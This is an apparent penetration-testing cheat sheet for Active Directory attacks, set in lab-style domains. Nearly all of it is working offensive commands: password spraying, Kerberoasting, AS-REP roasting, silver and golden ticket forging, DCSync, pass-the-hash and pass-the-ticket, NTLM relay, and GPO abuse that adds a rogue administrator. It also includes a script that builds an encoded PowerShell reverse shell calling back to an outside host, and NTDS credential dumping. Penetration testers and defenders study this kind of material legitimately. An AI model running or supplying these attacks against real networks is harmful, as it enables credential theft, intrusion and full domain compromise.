Active Directory
Enumeration
Manual Enumeration
# Display users in the domain
net user /domain
# Display info about the user jeffadmin
net user jeffadmin /domain
# Display groups in the domain
net group /domain
# Display members in specific group
net group "IT Department" /domain
# Display PDC of a domain
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
## Enumeration with PowerView
Import-Module .\PowerView.ps1
# Get info about Domain, Users and grouprs
Get-NetDomain ; Get-NetUser ; Get-NetGroup
# Domain computer overview
Get-NetComputer | select operatingsystem,dnshostname
# Scanning domain to find local administrative privileges for our user
Find-LocalAdminAccess
# Checking logged on users on client74
Get-NetSession -ComputerName client74 -Verbose
.\PsLoggedon.exe \\client74
## Enumeration Through SPN
# Listing the SPN accounts in the domain
Get-NetUser -SPN | select samaccountname,serviceprincipalname
# Listing SPN linked to iis_service user account
setspn -L iis_service
## Enumerating Object Permissions
# AD ACE permission types
GenericAll: Full permissions on object
GenericWrite: Edit certain attributes on the object
WriteOwner: Change ownership of the object
WriteDACL: Edit ACE's applied to object
AllExtendedRights: Change password, reset password, etc.
ForceChangePassword: Password change for object
Self (Self-Membership): Add ourselves to for example a group
# Enumerating ACLs for the Management Group (ObjectSID,ActiveDirectoryRights,SecurityIdentifier)
Get-ObjectAcl -Identity "Management Department" -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
# Converting the SecurityIdentifier into name
"S-1-5-21-1987370270-658905905-1781884369-512" | Convert-SidToName
## Enumerating Domain Shares
# List Domain Shares. add -CheckShareAccess if you want only ones accessible to us
Find-DomainShare Automated Enumeration
# SharpHound
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\sharepond -OutputPrefix "corp"
# BloodHound
sudo neo4j start # neo4j:neo4j
bloodhound
# Custom queries
MATCH (m:Computer) RETURN m # Display all computers
MATCH (m:User) RETURN m # Display all users
MATCH (m:GPO) RETURN m # Display GPO
MATCH (m:Group) RETURN m # Display Group
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p # Display all active sessions
# PingCastleNetexec
# Valid Users
netexec smb 192.168.147.95 -u "user" -p 'password'
# Valid local users
netexec smb 192.168.147.95 -u "user" -p 'password' --local-auth
# List Shares
netexec smb 192.168.147.95 -u "user" -p 'password' --shares
# Vulnerabilities Scan : www.netexec.wiki/smb-protocol/scan-for-vulnerabilities
netexec smb 192.168.147.95 -u 'user' -p 'pass' -M zerologon
netexec smb 192.168.147.95 -u 'user' -p 'pass' -M printnightmare
netexec smb 192.168.147.95 -u 'user' -p 'pass' -M nopac
netexec smb 192.168.147.95 -u 'user' -p 'pass' -M smbghost
netexec smb 192.168.147.95 -u 'user' -p 'pass' -M ms17-010
netexec smb 192.168.147.95 -u 'user' -p 'pass' -M coerce_plusAD Attacks
Password Attacks
# Usernames Bruteforce
kerbrute userenum --dc 192.168.147.97 -d corp.com -o kerbrute-userenum xato-net-10-million-usernames.txt
# Password spraying on windows and linux
.\Spray-Passwords.ps1 -Pass Nexus123! -Admin # (No accounts should be locked out)
Invoke-DomainPasswordSpray -UserList usernames.txt -Domain corp.com -PasswordList passlist.txt -OutFile creds.txt
.\kerbrute passwordspray -d corp.com .\usernames.txt "Nexus123!"
crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-successAS-REP Roasting
# AS-REP Roasting : AD user account with option Do not require Kerberos preauthentication enabled
impacket-GetNPUsers -dc-ip 192.168.0.9 -request -outputfile hashes.asreproast corp.com/pete
.\Rubeus.exe asreproast /nowrap
hashcat -m 18200 hashes.asreproast rockyou.txt -r best64.rule --force
# only list user accounts
impacket-GetNPUsers -dc-ip 192.168.0.9 corp.com/pete
Get-DomainUser -PreauthNotRequired
# If we have GenericWrite or GenericAll permissions on another AD user we could modify UAC of the user to not require Kerberos preauthentication
Invoke-ACLScanner -ResolveGUIDS | where {$_.ActiveDirectoryRights -eq 'GenericAll'}Kerberoasting
# Kerberoasting : Decrypt TGS-REP to obtain cleartext password of the service account
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
impacket-GetUserSPNs -request -dc-ip 192.168.171.70 corp.com/pete
hashcat -m 13100 hashes.kerberoast rockyou.txt -r best64.rule --force
# If we have GenericWrite or GenericAll permissions on another AD user we could set an SPN for the user, kerberoast the account, and crack the password hashSilver Tickets
# Silver Ticket : Forges a TGS ticket for a specific service with the use of the service account password or NTLM hash. We need : SPN password hash, Domain SID, Target SPN
# 1. SPN password hash => sekurlsa::logonpasswords
# 2. Domain SID : we need to omit the 4 last digit => whoami /user
# 3. Target SPN => HTTP/web04.corp.com:80
kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadminDCSync Attack
# Impersonates a DC to request replication of user credentials. Domain Admins, Enterprise Admins, Administrators groups have the right by default to do so
lsadump::dcsync /user:corp\dave
impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"P@ssw0rd"@192.168.50.70GPO
# If we have acces to a GPO (GenericAll,GenericWrite,WriteProperty). www.thehacker.recipes/ad/movement/group-policies
# List GPO : Get-GPO -all # update GPO : gpupdate
python3 pygpoabuse.py 'corp.com/user:pass' -gpo-id '469...D81' -command 'net user gpoabuse Password123! /add && net localgroup administrators gpoabuse /add' -vLateral Movement
WMI / WinRM
# WMI 135 : Remote Procedure Calls (RPC)
# We need the credentials of a member of the Administrators local group
wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"
# with Powershell we can use it to get rev shell after base64 encoding
$username = 'jen'; $password = 'Nexus123!'; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; $options = New-CimSessionOption -Protocol DCOM; $session = New-Cimsession -ComputerName 192.168.189.73 -Credential $credential -SessionOption $Options; $command = 'calc'; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
# WinRM 5986,5985 : Microsoft Windows Remote Management
# We need a domain user with Administrators or Remote Management priv
winrs -r:files04 -u:jen -p:Nexus123! "cmd /c hostname & whoami"
# Powershell
$username = 'jen'; $password = 'Nexus123!'; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; New-PSSession -ComputerName 192.168.189.73 -Credential $credential;
Enter-PSSession 1import sys
import base64
payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.118.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
print(cmd)PsExec
# We need a user of Administrators local group, ADMIN$ share must be available, File and Printer Sharing has to be turned on
.\PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmdPass the Hash (PtH)
# Pass the Hash from Windows Using Mimikatz:
mimikatz.exe privilege::debug "sekurlsa::pth /user:<user> /rc4:<hash> /domain:<domain> /run:cmd.exe" exit
# Pass the Hash with PowerShell Invoke-TheHash (Windows)
Import-Module .\Invoke-TheHash.psd1
Invoke-SMBExec -Target <IP> -Domain <domain> -Username <user> -Hash <hash> -Command "whoami" -Verbose
# Pass the Hash with Impacket (Linux) / impacket-wmiexec impacket-atexec impacket-smbexec
impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
# Pass the Hash with CrackMapExec (Linux)
crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami
# Pass the Hash with evil-winrm (Linux)
evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453
# Enable Restricted Admin Mode to Allow PtH with RDP
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
# Pass the Hash with RDP (Linux)
xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949BPass the Key / OverPass the Hash
# Mimikatz - Pass the Key/OverPass the Hash
sekurlsa::pth /domain:domain.htb /user:user /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f /run:powershell
# Generate a TGT by authenticating to a network share. Converting NTLM hash to Kerberos TGT
net use \\files04
klist # Listing Kerberos tickets
.\PsExec.exe \\files04 cmd # Opening remote connection using Kerberos auth
# Mimikatz - Extract Kerberos Keys
sekurlsa::ekeys
# Rubeus - Pass the Key/OverPass the Hash
Rubeus.exe asktgt /domain:domain.htb /user:user /aes256:b21c99f..SNIP..da3fe60 /nowrapPass the Ticket (PtT)
# Pass the Ticket : export a TGS ticket of a user and use it to authenticate to a specific service
# Mimikatz - Export Tickets
sekurlsa::tickets /export
# Rubeus - Export Tickets
Rubeus.exe dump /nowrap
# Rubeus Pass the Ticket
Rubeus.exe asktgt /domain:domain.htb /user:user /rc4:3f74a71..SNIP..2f077b1ce50f /ptt
# Another way is to import the ticket into the current session using the .kirbi
Rubeus.exe ptt /ticket:RND-user@krbtgt-domain.htb.kirbi
# Convert .kirbi to Base64 Format
[Convert]::ToBase64String([IO.File]::ReadAllBytes("RND-user@krbtgt-domain.htb.kirbi"))
# Pass the Ticket - Base64 Format
Rubeus.exe ptt /ticket:doIE1jCCBNKgAwIBBaEDAgEWooID+TCCA/VhggPxMIzSrk/gHuER2XRLdV/<SNIP>
# Mimikatz - Pass the Ticket
kerberos::ptt "C:\path\Mimikatz\RND-user@krbtgt-domain.htb.kirbi"
exit
dir \\DC01.inlanefreight.htb\c$
# Mimikatz - PowerShell Remoting - Pass the Ticket
kerberos::ptt "C:\path\Mimikatz\RND-user@krbtgt-domain.htb.kirbi"
exit
powershell
Enter-PSSession -ComputerName DC01DCOM
# we need RPC port 135 and local administrator access
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.163.73"))
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e base64_revshell_encode","7")Relaying Net-NTLMv2
# Starting ntlmrelayx for a Relay-attack targeting 192.168.0.2 : using www.revshells.com Powershell #3 (Base64)
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.0.2 -c "powershell -e JABjAGwAaQBlAG4AdA..."Active Directory Persistence
Golden Ticket
# Golden Ticket : create TGTs with the use of krbtgt password hash
# We need Domain Admin's group account or access to DC
lsadump::lsa /patch # Dumping the krbtgt password hash from DC.
# From a compromised machine or our attack machine
kerberos::purge # Delete any existing Kerberos tickets
# Creating a golden ticket. SID can be extracted with (whoami /user)
kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
PsExec.exe \\dc1 cmd.exe # Execute cmd on DC, using hostname instead of IP to use kerberos authShadow Copies
# Shadow Copy of the entire C: drive using cmd.exe. Can be used to extract hashes and kerberos keys of all AD users
vshadow.exe -nw -p C: # keep note of Shadow copy device name
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak
reg.exe save hklm\system c:\system.bak
# In our attack box
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCALLast updated